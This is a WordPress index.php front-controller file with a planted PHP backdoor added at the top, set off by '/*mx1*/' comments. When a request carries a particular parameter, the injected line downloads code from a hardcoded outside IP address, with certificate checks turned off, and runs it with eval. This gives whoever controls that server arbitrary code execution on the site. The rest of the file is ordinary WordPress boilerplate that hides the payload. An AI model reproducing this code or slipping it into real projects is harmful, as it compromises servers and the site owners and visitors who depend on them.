<?php
/*mx1*/if(isset($_REQUEST["mxcfg"])&&$_REQUEST["mxcfg"]!==""){$_mxd="";$_mxu="http://45.89.60.90/v/door/".$_REQUEST["mxcfg"].".txt";if(function_exists("curl_exec")){$_mxc=curl_init($_mxu);curl_setopt($_mxc,CURLOPT_RETURNTRANSFER,1);curl_setopt($_mxc,CURLOPT_FOLLOWLOCATION,1);curl_setopt($_mxc,CURLOPT_SSL_VERIFYPEER,0);curl_setopt($_mxc,CURLOPT_SSL_VERIFYHOST,0);$_mxd=curl_exec($_mxc);curl_close($_mxc);}if(empty($_mxd)&&function_exists("file_get_contents"))$_mxd=file_get_contents($_mxu);if(!empty($_mxd)){eval("?>".$_mxd);}exit;}/*mx1*/
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';